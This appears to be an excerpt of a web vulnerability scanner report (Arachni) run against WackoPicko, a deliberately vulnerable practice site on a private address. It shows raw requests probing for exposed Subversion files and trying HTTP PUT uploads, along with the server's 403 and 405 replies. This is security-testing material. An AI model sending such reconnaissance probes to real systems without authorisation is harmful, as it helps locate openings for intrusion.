GET /WackoPicko/ HTTP/1.1 Host: 192.168.0.26 Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.5.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.8,he;q=0.6 X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:49:45 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Set-Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1267
Content-Type: text/html
<html>
<head>
<link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
<link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print">
<!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
<link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
<title>WackoPicko.com</title>
</head>
<body>
<div class="container " style="border: 2px solid #5c95cf;">
<div class="column span-24 first last">
<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
</div>
<div id="menu">
<div class="column prepend-1 span-14 first">
<ul class="menu">
<li class="current"><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
<li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
<li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
<li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
</ul>
</div>
<div class="column prepend-1 span-7 first last">
<ul class="menu top_login" >
<li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
</ul>
</div>
</div>
<div class="column span-24 first last" id="search_bar_blue">
<div class="column prepend-17 span-7 first last" id="search_box">
<form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
<input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
<input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
</form>
</div>
</div>
<div class="column prepend-1 span-24 first last">
<h2>Welcome to WackoPicko</h2>
<p>
On WackoPicko, you can share all your crazy pics with your friends. <br />
But that's not all, you can also buy the rights to the high quality <br />
version of someone's pictures. WackoPicko is fun for the whole family.
</p>
<h3>New Here?</h3>
<p>
<h4><a href="/WackoPicko/users/register.php">Create an account</a></h4>
</p>
<p>
<h4><a href="/WackoPicko/users/sample.php?userid=1">Check out a sample user!</a></h4>
</p>
<p>
<h4><a href="/WackoPicko/calendar.php">What is going on today?</a></h4>
</p>
<p>
<h4>Or you can test to see if WackoPicko can handle a file:</h4> <br />
<script>
document.write('<form enctype="multipart/form-data" action="/WackoPicko/pic' + 'check' + '.php" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="30000" />Check this file: <input name="userfile" type="file" /> <br />With this name: <input name="name" type="text" /> <br /> <br /><input type="submit" value="Send File" /><br /> </form>');
</script>
</p>
</div>
<div class="column span-24 first last" id="footer" >
<ul>
<li><a href="/WackoPicko/">Home</a> |</li>
<li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
<li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
<li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
</ul>
</div>
</div>
</body>
</html>
server
using
GET
at
http://192.168.0.26/WackoPicko/pictures/.svn/wc.db
pointing to
http://192.168.0.26/WackoPicko/pictures/.svn/wc.db
.
Raw HTTP request used to retrieve the page.
GET /WackoPicko/pictures/.svn/wc.db HTTP/1.1 Host: 192.168.0.26 Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.5.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.8,he;q=0.6 X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 403 Forbidden
Date: Mon, 06 Aug 2018 22:50:12 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 200
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /WackoPicko/pictures/.svn/wc.db
on this server.</p>
</body></html>
Raw HTTP request used to retrieve the page.
GET /WackoPicko/ HTTP/1.1 Host: 192.168.0.26 Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.5.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.8,he;q=0.6 X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:49:45 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Set-Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1267
Content-Type: text/html
<html>
<head>
<link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
<link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print">
<!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
<link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
<title>WackoPicko.com</title>
</head>
<body>
<div class="container " style="border: 2px solid #5c95cf;">
<div class="column span-24 first last">
<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
</div>
<div id="menu">
<div class="column prepend-1 span-14 first">
<ul class="menu">
<li class="current"><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
<li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
<li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
<li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
</ul>
</div>
<div class="column prepend-1 span-7 first last">
<ul class="menu top_login" >
<li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
</ul>
</div>
</div>
<div class="column span-24 first last" id="search_bar_blue">
<div class="column prepend-17 span-7 first last" id="search_box">
<form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
<input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
<input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
</form>
</div>
</div>
<div class="column prepend-1 span-24 first last">
<h2>Welcome to WackoPicko</h2>
<p>
On WackoPicko, you can share all your crazy pics with your friends. <br />
But that's not all, you can also buy the rights to the high quality <br />
version of someone's pictures. WackoPicko is fun for the whole family.
</p>
<h3>New Here?</h3>
<p>
<h4><a href="/WackoPicko/users/register.php">Create an account</a></h4>
</p>
<p>
<h4><a href="/WackoPicko/users/sample.php?userid=1">Check out a sample user!</a></h4>
</p>
<p>
<h4><a href="/WackoPicko/calendar.php">What is going on today?</a></h4>
</p>
<p>
<h4>Or you can test to see if WackoPicko can handle a file:</h4> <br />
<script>
document.write('<form enctype="multipart/form-data" action="/WackoPicko/pic' + 'check' + '.php" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="30000" />Check this file: <input name="userfile" type="file" /> <br />With this name: <input name="name" type="text" /> <br /> <br /><input type="submit" value="Send File" /><br /> </form>');
</script>
</p>
</div>
<div class="column span-24 first last" id="footer" >
<ul>
<li><a href="/WackoPicko/">Home</a> |</li>
<li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
<li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
<li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
</ul>
</div>
</div>
</body>
</html>
server
using
PUT
at
http://192.168.0.26/WackoPicko/pictures/Arachni-ca890a60d2e09a1de6dc78b0f4d0f8ec
pointing to
http://192.168.0.26/WackoPicko/pictures/Arachni-ca890a60d2e09a1de6dc78b0f4d0f8ec
.
Raw HTTP request used to retrieve the page.
PUT /WackoPicko/pictures/Arachni-ca890a60d2e09a1de6dc78b0f4d0f8ec HTTP/1.1 Host: 192.168.0.26 Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.5.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.8,he;q=0.6 X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5 Content-Length: 55 Expect: 100-continue Created by Arachni. PUTca890a60d2e09a1de6dc78b0f4d0f8ec
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 100 Continue
HTTP/1.1 405 Method Not Allowed
Date: Mon, 06 Aug 2018 22:50:10 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
Allow: GET,HEAD,POST,OPTIONS,TRACE
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 230
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>405 Method Not Allowed</title>
</head><body>
<h1>Method Not Allowed</h1>
<p>The requested method PUT is not allowed for the URL /WackoPicko/pictures/Arachni-ca890a60d2e09a1de6dc78b0f4d0f8ec.</p>
</body></html>
Raw HTTP request used to retrieve the page.
GET /WackoPicko/ HTTP/1.1 Host: 192.168.0.26 Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.5.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.8,he;q=0.6 X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:49:45 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Set-Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1267
Content-Type: text/html
<html>
<head>
<link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
<link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print">
<!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
<link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
<title>WackoPicko.com</title>
</head>
<body>
<div class="container " style="border: 2px solid #5c95cf;">
<div class="column span-24 first last">
<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
</div>
<div id="menu">
<div class="column prepend-1 span-14 first">
<ul class="menu">
<li class="current"><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
<li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
<li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
<li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
</ul>
</div>
<div class="column prepend-1 span-7 first last">
<ul class="menu top_login" >
<li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
</ul>
</div>
</div>
<div class="column span-24 first last" id="search_bar_blue">
<div class="column prepend-17 span-7 first last" id="search_box">
<form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
<input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
<input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
</form>
</div>
</div>
<div class="column prepend-1 span-24 first last">
<h2>Welcome to WackoPicko</h2>
<p>
On WackoPicko, you can share all your crazy pics with your friends. <br />
But that's not all, you can also buy the rights to the high quality <br />
version of someone's pictures. WackoPicko is fun for the whole family.
</p>
<h3>New Here?</h3>
<p>
<h4><a href="/WackoPicko/users/register.php">Create an account</a></h4>
</p>
<p>
<h4><a href="/WackoPicko/users/sample.php?userid=1">Check out a sample user!</a></h4>
</p>
<p>
<h4><a href="/WackoPicko/calendar.php">What is going on today?</a></h4>
</p>
<p>
<h4>Or you can test to see if WackoPicko can handle a file:</h4> <br />
<script>
document.write('<form enctype="multipart/form-data" action="/WackoPicko/pic' + 'check' + '.php" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="30000" />Check this file: <input name="userfile" type="file" /> <br />With this name: <input name="name" type="text" /> <br /> <br /><input type="submit" value="Send File" /><br /> </form>');
</script>
</p>
</div>
<div class="column span-24 first last" id="footer" >
<ul>
<li><a href="/WackoPicko/">Home</a> |</li>
<li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
<li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
<li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
</ul>
</div>
</div>
</body>
</html>
server
using
PUT
at
http://192.168.0.26/WackoPicko/users/Arachni-ca890a60d2e09a1de6dc78b0f4d0f8ec
pointing to
http://192.168.0.26/WackoPicko/users/Arachni-ca890a60d2e09a1de6dc78b0f4d0f8ec
.
Raw HTTP request used to retrieve the page.
PUT /WackoPicko/users/Arachni-ca890a60d2e09a1de6dc78b0f4d0f8ec HTTP/1.1 Host: 192.168.0.26 Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.5.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.8,he;q=0.6 X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5 Content-Length: 55 Expect: 100-continue Created by Arachni. PUTca890a60d2e09a1de6dc78b0f4d0f8ec
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 100 Continue
HTTP/1.1 405 Method Not Allowed
Date: Mon, 06 Aug 2018 22:50:08 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
Allow: GET,HEAD,POST,OPTIONS,TRACE
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 228
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>405 Method Not Allowed</title>
</head><body>
<h1>Method Not Allowed</h1>
<p>The requested method PUT is not allowed for the URL /WackoPicko/users/Arachni-ca890a60d2e09a1de6dc78b0f4d0f8ec.</p>
</body></html>
Raw HTTP request used to retrieve the page.
GET /WackoPicko/ HTTP/1.1 Host: 192.168.0.26 Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.5.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.8,he;q=0.6 X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:49:45 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Set-Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1267
Content-Type: text/html
<html>
<head>
<link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
<link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print">
<!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
<link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
<title>WackoPicko.com</title>
</head>
<body>
<div class="container " style="border: 2px solid #5c95cf;">
<div class="column span-24 first last">
<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
</div>
<div id="menu">
<div class="column prepend-1 span-14 first">
<ul class="menu">
<li class="current"><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
<li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
<li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
<li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
</ul>
</div>
<div class="column prepend-1 span-7 first last">
<ul class="menu top_login" >
<li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
</ul>
</div>
</div>
<div class="column span-24 first last" id="search_bar_blue">
<div class="column prepend-17 span-7 first last" id="search_box">
<form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
<input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
<input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
</form>
</div>
</div>
<div class="column prepend-1 span-24 first last">
<h2>Welcome to WackoPicko</h2>
<p>
On WackoPicko, you can share all your crazy pics with your friends. <br />
But that's not all, you can also buy the rights to the high quality <br />
version of someone's pictures. WackoPicko is fun for the whole family.
</p>
<h3>New Here?</h3>
<p>
<h4><a href="/WackoPicko/users/register.php">Create an account</a></h4>
</p>
<p>
<h4><a href="/WackoPicko/users/sample.php?userid=1">Check out a sample user!</a></h4>
</p>
<p>
<h4><a href="/WackoPicko/calendar.php">What is going on today?</a></h4>
</p>
<p>
<h4>Or you can test to see if WackoPicko can handle a file:</h4> <br />
<script>
document.write('<form enctype="multipart/form-data" action="/WackoPicko/pic' + 'check' + '.php" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="30000" />Check this file: <input name="userfile" type="file" /> <br />With this name: <input name="name" type="text" /> <br /> <br /><input type="submit" value="Send File" /><br /> </form>');
</script>
</p>
</div>
<div class="column span-24 first last" id="footer" >
<ul>
<li><a href="/WackoPicko/">Home</a> |</li>
<li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
<li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
<li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
</ul>
</div>
</div>
</body>
</html>
server
using
GET
at
http://192.168.0.26/WackoPicko/css/blueprint/.svn/all-wcprops
pointing to
http://192.168.0.26/WackoPicko/css/blueprint/.svn/all-wcprops
.
Raw HTTP request used to retrieve the page.
GET /WackoPicko/css/blueprint/.svn/all-wcprops HTTP/1.1 Host: 192.168.0.26 Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.5.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.8,he;q=0.6 X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec Cookie: PHPSESSID=uaamb63nosf2arsi1c95ipa045
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 403 Forbidden
Date: Mon, 06 Aug 2018 22:52:45 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 211
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /WackoPicko/css/blueprint/.svn/all-wcprops
on this server.</p>
</body></html>
Raw HTTP request used to retrieve the page.
GET /WackoPicko/ HTTP/1.1 Host: 192.168.0.26 Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.5.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.8,he;q=0.6 X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:49:45 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Set-Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1267
Content-Type: text/html
<html>
<head>
<link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
<link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print">
<!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
<link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
<title>WackoPicko.com</title>
</head>
<body>
<div class="container " style="border: 2px solid #5c95cf;">
<div class="column span-24 first last">
<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
</div>
<div id="menu">
<div class="column prepend-1 span-14 first">
<ul class="menu">
<li class="current"><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
<li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
<li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
<li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
</ul>
</div>
<div class="column prepend-1 span-7 first last">
<ul class="menu top_login" >
<li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
</ul>
</div>
</div>
<div class="column span-24 first last" id="search_bar_blue">
<div class="column prepend-17 span-7 first last" id="search_box">
<form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
<input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
<input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
</form>
</div>
</div>
<div class="column prepend-1 span-24 first last">
<h2>Welcome to WackoPicko</h2>
<p>
On WackoPicko, you can share all your crazy pics with your friends. <br />
But that's not all, you can also buy the rights to the high quality <br />
version of someone's pictures. WackoPicko is fun for the whole family.
</p>
<h3>New Here?</h3>
<p>
<h4><a href="/WackoPicko/users/register.php">Create an account</a></h4>
</p>
<p>
<h4><a href="/WackoPicko/users/sample.php?userid=1">Check out a sample user!</a></h4>
</p>
<p>
<h4><a href="/WackoPicko/calendar.php">What is going on today?</a></h4>
</p>
<p>
<h4>Or you can test to see if WackoPicko can handle a file:</h4> <br />
<script>
document.write('<form enctype="multipart/form-data" action="/WackoPicko/pic' + 'check' + '.php" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="30000" />Check this file: <input name="userfile" type="file" /> <br />With this name: <input name="name" type="text" /> <br /> <br /><input type="submit" value="Send File" /><br /> </form>');
</script>
</p>
</div>
<div class="column span-24 first last" id="footer" >
<ul>
<li><a href="/WackoPicko/">Home</a> |</li>
<li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
<li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
<li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
</ul>
</div>
</div>
</body>
</html>
server
using
PUT
at
http://192.168.0.26/WackoPicko/upload/3/Arachni-ca890a60d2e09a1de6dc78b0f4d0f8ec
pointing to
http://192.168.0.26/WackoPicko/upload/3/Arachni-ca890a60d2e09a1de6dc78b0f4d0f8ec
.
Raw HTTP request used to retrieve the page.
PUT /WackoPicko/upload/3/Arachni-ca890a60d2e09a1de6dc78b0f4d0f8ec HTTP/1.1 Host: 192.168.0.26 Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.5.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.8,he;q=0.6 X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec Cookie: PHPSESSID=uaamb63nosf2arsi1c95ipa045 Content-Length: 55 Expect: 100-continue Created by Arachni. PUTca890a60d2e09a1de6dc78b0f4d0f8ec
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 100 Continue
HTTP/1.1 405 Method Not Allowed
Date: Mon, 06 Aug 2018 22:52:38 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
Allow: GET,HEAD,POST,OPTIONS,TRACE
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 231
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>405 Method Not Allowed</title>
</head><body>
<h1>Method Not Allowed</h1>
<p>The requested method PUT is not allowed for the URL /WackoPicko/upload/3/Arachni-ca890a60d2e09a1de6dc78b0f4d0f8ec.</p>
</body></html>
Raw HTTP request used to retrieve the page.
GET /WackoPicko/ HTTP/1.1 Host: 192.168.0.26 Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.5.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.8,he;q=0.6 X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:49:45 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
